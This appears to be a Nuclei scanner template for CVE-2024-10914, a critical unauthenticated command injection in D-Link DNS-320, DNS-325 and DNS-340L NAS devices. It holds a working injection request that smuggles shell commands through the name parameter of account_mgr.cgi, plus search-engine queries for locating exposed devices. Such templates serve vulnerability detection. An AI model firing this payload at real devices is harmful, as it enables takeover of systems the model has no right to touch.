id: CVE-2024-10914 info: name: D-Link NAS - Command Injection via Name Parameter author: s4e-io severity: critical description: | A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. impact: | Unauthenticated attackers can execute arbitrary OS commands via the name parameter, potentially compromising the entire D-Link NAS device. remediation: | Update D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L firmware to versions released after 20241028. reference: - https://github.com/verylazytech/CVE-2024-10914 - https://www.usom.gov.tr/bildirim/tr-24-1836 - https://nvd.nist.gov/vuln/detail/CVE-2024-10914 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-10914 cwe-id: CWE-707 epss-score: 0.93611 epss-percentile: 0.99845 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: vendor: dlink product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" tags: cve,cve2024,dlink,sharecenter,rce,vkev,vuln http: - raw: - | GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1 Host: {{Hostname}} payloads: command: - "id" - "ifconfig" stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" - "contains_all(body, 'inet addr:', 'Mask:')" condition: or - type: dsl dsl: - 'contains(body, "Content-type: text/html")' - "status_code == 200" condition: and # digest: 4b0a0048304602210097f1ad564b50180f7add33a4dac5ac78fd362e2aef339f005a3f6aa362850a2a022100b6020b509e4726d524fb1674c4ae962181cee9027fcf057b3f86221ae188499f:922c64590222798bb761d5b6d8e72950